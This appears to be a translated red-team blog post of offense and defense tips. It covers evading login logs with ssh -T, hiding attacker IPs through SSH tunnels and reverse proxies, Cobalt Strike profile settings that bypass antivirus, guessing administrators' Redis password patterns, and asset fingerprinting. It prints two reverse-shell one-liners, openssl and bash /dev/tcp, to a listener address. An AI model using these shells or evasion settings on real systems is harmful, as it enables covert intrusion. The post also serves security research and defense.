# Red Team Live Offense and Defense Techniques (II)

# Preface

Hello, I'm Windy, I believe that many partners have read this series of previous [red team offense and defense technology (a)](https://www.anquanke.com/post/id/249994), the previous to a real red team offense and defense cases as a start, leading to a series of knowledge and penetration of some of the small Tips. Tips. Recently, because of the relevant laws and regulations, we can no longer use the real attack and defense cases as a lecture, so this chapter will be based on the attack and defense ideas to start to explain, as far as possible to reproduce the local environment, hope you understand.

As a sequel to this series, I hope to be able to explain the red and blue sides, in the analysis of some of the attack, will also cause the defense to think about the attack. The significance of the red and blue confrontation is also in this continuous attack to constantly find the balance of defense, so ** unknown attack, how to know the defense **.

**This article is for security research only, do not break the law **.

# Ghost login

`ssh -T root@192.168.1.1 /usr/bin/bash -i`

I believe that the partners familiar with the red team, it is not difficult to see that the above command in the daily infiltration, to carry out the login operation will be often used, because he does not assign the pseudo-terminal way and will not be recorded by the w and last and other commands. Therefore, at some point, if the defense in the machine troubleshooting, only check the logs found that there is no abnormal login, but did not notice whether there is an abnormal network connection, it will be judged as a false alarm, giving the attacker an opportunity to take advantage of.

! [1](. /images/1.jpg)

As you can see from the image above, there is no login information, and again lastlog does not record this login behavior. So there is no way to troubleshoot this way? In fact, no, because the attacker is not without traces when connecting to port 22, as long as the connection to the SSH port there must be a record.

! [1](. /images/2.png)

As shown in the figure, we found the malicious IP address connecting to the server from the lsof as well as the ss command results, so leave a question here, what other ways can the attacker circumvent such an exclusion method? In fact, in the national HW, there are many common ways to hide the IP address of individual hosts, such as: broiler proxy traffic, VPN, basic cloaking facilities and other means. And in the process of attacking the traceability, the defense by attacking the broiler server to obtain permissions so as to trace the attacker's information by means of tried and true, unless the attacker is willing to take the broiler permissions after long-term maintenance, or else some good level of traceability personnel can also take the permissions to trace the source of the attack by the same way, of course, very few attackers are willing to spend the time cost on a broiler, basically use it once for One.

However, it has to be recognized that broilers are still a very effective way of hiding and attacking today.

# SSH Tunneling Stealth

In the current intranet penetration, there are a large number of various proxy tools on the market, such as: frp, ew, nps, venom, regeorg, etc., according to different scenarios using different protocols, but also DNS, ICMP, RDP, these unconventional protocols proxy tool. But these proxy tools are basically sensitive to some kill software and state sense, basically in the non-kill-free state is to land on the kill. So it is also more recommended to use some of the tools that come with the system to proxy traffic, such as: SSH tunnel proxy, Windows netsh, iptables and so on. This paragraph will focus on SSH tunneling proxy Tips.

! [1](. /images/3.png)

Here we can focus on the place where the arrow points to, through the SSH tunneling proxy, leaving aside our VPS user passwords are monitored, the real IP is also unobstructed in the network process and related connections, the old defense members can be very intuitively found to be a ** [SSH Tunneling Proxy event] **, but here is not we! But here is not what we need to focus on, after all, we can not take all the defense as a fool, to face up to the opponent's ability.

! [1](. /images/4.png)

Here we take the Nginx reverse proxy, the specific implementation of the way not much to say here, interested students can pay attention to Ngrok or Heroku and other ways to configure, but also their own use of anonymous domain names and servers to build.

Through the above figure we can see the use of reverse proxy address SSH tunnel forwarding can effectively hide the real IP address and IP address, note that the IP address here is the address of the Ngrok server, thus realizing the effect of concealment.

# Bounce shell cloaking

In our daily penetration of Linux hosts, when we encounter RCE vulnerabilities, we usually use the following two commands when we need to bounce back to get the interactive shell.

Example 1.

```bash
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s
``

Example 2.

``bash
bash -c 'exec bash -i &>/dev/tcp/192.168.0.100/2333 <&1'
```

The above two examples can be said to be the two most commonly used bounce shell commands in our daily infiltration, of course, the advantage of example 1 is that his traffic is encrypted, in this case the command executed by the bounce shell can't be monitored by the flow control, and at most, it may be reported as **Covert Tunneling Communication** anomaly, but this kind of event is very important for a unit with a certain size of guards. But this kind of event is really too normal for a guarded unit of a certain size. Thousands of similar false alarms occur every day, and alarms like sunflower and teamview are basically ignored.

But what we need to pay attention to is also exactly this kind of bounce way, both example 1 and example 2 we will find are inevitably leaked the real IP address. In fact, the stealth approach here is the same principle as the SSH tunneling proxy above. Are realized through the reverse proxy, the previous article in the penetration of the operation has also been used in this way, and then there are masters have consulted, so here again out of cold rice hot fried.

! [1](. /images/5.png)

The final effect of the above figure, you can see that the address of the bounce shell for the reverse proxy domain name, the connection port 10075 and the actual online port is not this one, this is only with the front-end servers to establish a network connection, the actual real online for the front-end servers forwarded to the back-end servers of the address.

# CosbaltStrike Profile

I believe that the vast majority of students engaged in penetration work for the CosbaltStrike tool is not unfamiliar, although the current first-line red team has been gradually transferred from the CS to some niche C2 facilities to go, but there is no denying that the CS is still a very good tool, which provides a customized profile traffic characteristics of the features, if the configuration Properly with the domain front technology to achieve high reputation domain name combination, the effect of the creation of basically no difference with the normal traffic.

Flexible writing Porfile is very effective, and not only applied to the forgery of stealth, in the do not kill, through the configuration of the relevant obfuscation parameters can also be over the Kaspersky's traffic check, in the previous test of the do not kill, basically static has been over, but the script is still started a while on the check, this time through the configuration of the CS profile of the This is solved by configuring the CS profile with the following two pieces of code.

! [1](. /images/6.png)

Bypassed by configuring **set obfuscate “true”;** highly obfuscated in-memory code.

And for the way we use domain fronting, assuming the profile is not configured in any way, it will alert. As shown below

! [1](. /images/7.png)

This can be solved by configuring the set cleanup “true”; of the stage in the profile.

Here wind up brother will write their own profile file to Github, interested partners can download their own personalized configuration.

**Github:https://github.com/wikiZ/service_cobaltstrike**

# Ops inertia password

In many cases, we can take down hosting services horizontally without necessarily hitting the vulnerabilities head-on. In a penetration project, we took down 23 Redis databases by speculating on the password habits of the operation and maintenance, and initially found only one redis database password through the configuration file, but there are a large number of redis databases deployed on the local machine, and the passwords for these redis databases are not always known. But by analyzing the port numbers and passwords of these redis databases a pattern was obtained.

**zzRedis63902020** Like this password, it is not difficult to guess the password for the prefix and suffix fixed format, the middle four for the local port number, and then re-combine the login, and then try to log in, and found that indeed.

! [1](. /images/8.png)

Then, know it all.

It's worth thinking that there really shouldn't be too many ways to broaden permissions with such password combinations. After all, operation and maintenance is also a person, it is impossible to a service a password, but the security management regulations must also be implemented, so many times there are these rich regular password.

So like this kind of attack to get access, maybe not the defense side of the people can not, but really is the road is not flat it hahaha.

# Behavioral mapping

The above explains a few red and blue confrontation often encountered in some of the Tips, in fact, on some of the current local network protection program, and the difference between regular penetration is not very big, so some of the ways mentioned above may be more suitable for use in the national HW operations, because both the level of personnel or the degree of importance are very different.

**But behavioral mapping is a very effective means of mapping assets, both in routine infiltration and in HW programs. **

First of all, we need to think about the three W's when it comes to sorting out corporate assets, that is, who? what? where? Literally, whose? what? where? where? Applied to the red team, at present, all levels of protection network for the assets belong to the division is actually more strict, for example, the assets belong to the total group or secondary units or subsidiaries, whether with the group intranet interoperability? All are points that need to be thought about and confirmed. Then we first think from who and then from what who and where to collect, assets belong to the unit and related network information, such as the use of the framework, deployment of business systems, services, open ports, the use of the development language, domain names and so on.

Different groups may show basic unique characteristics, when we can grasp this characteristic, then we can identify all the individuals in the group as far as possible, and these so-called behavioral characteristics in cyberspace mapping shows the banner characteristics of each port protocol of the device.
At present, the fingerprint library formed by the common component fingerprinting commonly used in cyberspace mapping is to make use of the common default configuration features of common components to carry out the identification of “behavior”.

In other words, when we have certain characteristics of the target assets, we can write rules to match the assets more accurately according to our understanding of fingerprints. And through the asset mapping approach can also minimize the probability of active scanning to be found, because the general target organization, his external business services will not be frequently changed, so the information we get is usually more accurate.

**Here we most often extracted features like favicon icon hash code, HTTPS certificate serial number, front-end code snippet, service connection banner and so on. **

For example, if we go to do a vulnerability response, let's take a public vulnerability on exploit-db as an example.

! [1](. /images/9.png)

The example vulnerability is an unauthorized RCE vulnerability of a foreign WIFI camera device, we can see that the public vulnerability POC got two key information, the vulnerability is by connecting to the target device telnet port 23, because the default user login is not forensic lead. So we associated the affected asset by extracting the two features **port:23 + “goke login: ”** as a fingerprint.

! [1](. /images/10.png)

**Associating assets via Kunyu reveals a total of 318 vulnerable assets across the network. **

Similarly for some hidden assets in the intranet a HOSTS collision approach can be taken. This approach also stems from the intranet in the enterprise may use a lot of Nginx reverse proxy, only can use the configured ServerName of the intranet domain name to access, then we use HOSTS collision on the extranet can be collided with a lot of only intranet use of business platforms, straight through the intranet business!

! [1](. /images/11.png)

Here only to do the role of a brick to attract jade, more efficient way to collect enterprise assets can be concerned about the use of **Kunyu (Kunyu)**.

**[knownsec/Kunyu: Kunyu, more efficient corporate asset collection (github.com)](https://github.com/knownsec/Kunyu)**

# Postscript

Once again, thank you for your support, I have always found it interesting to write articles, to pass on what I have learned and summarized in the form of words, and my initial idea was the same, I think that even if only one master feels something after seeing my article, then I think what I have done is not meaningless.

This article serves as a sequel, and probably the final chapter, of the Red Team Offense and Defense series. In my TODO, after that will be released a ** new cybercrime attack and defense research ** on this direction from the attack idea, intelligence research to research and analysis for in-depth explanation, please look forward to.

Kunyu (Kunyu), the later continued to maintain and update, has been focusing on the combination of mapping data for in-depth information collection, and will follow up on the update point focus on this. The same applied to the fight against new types of cybercrime also has a significant effect, will be after the article to show you in a practical way.

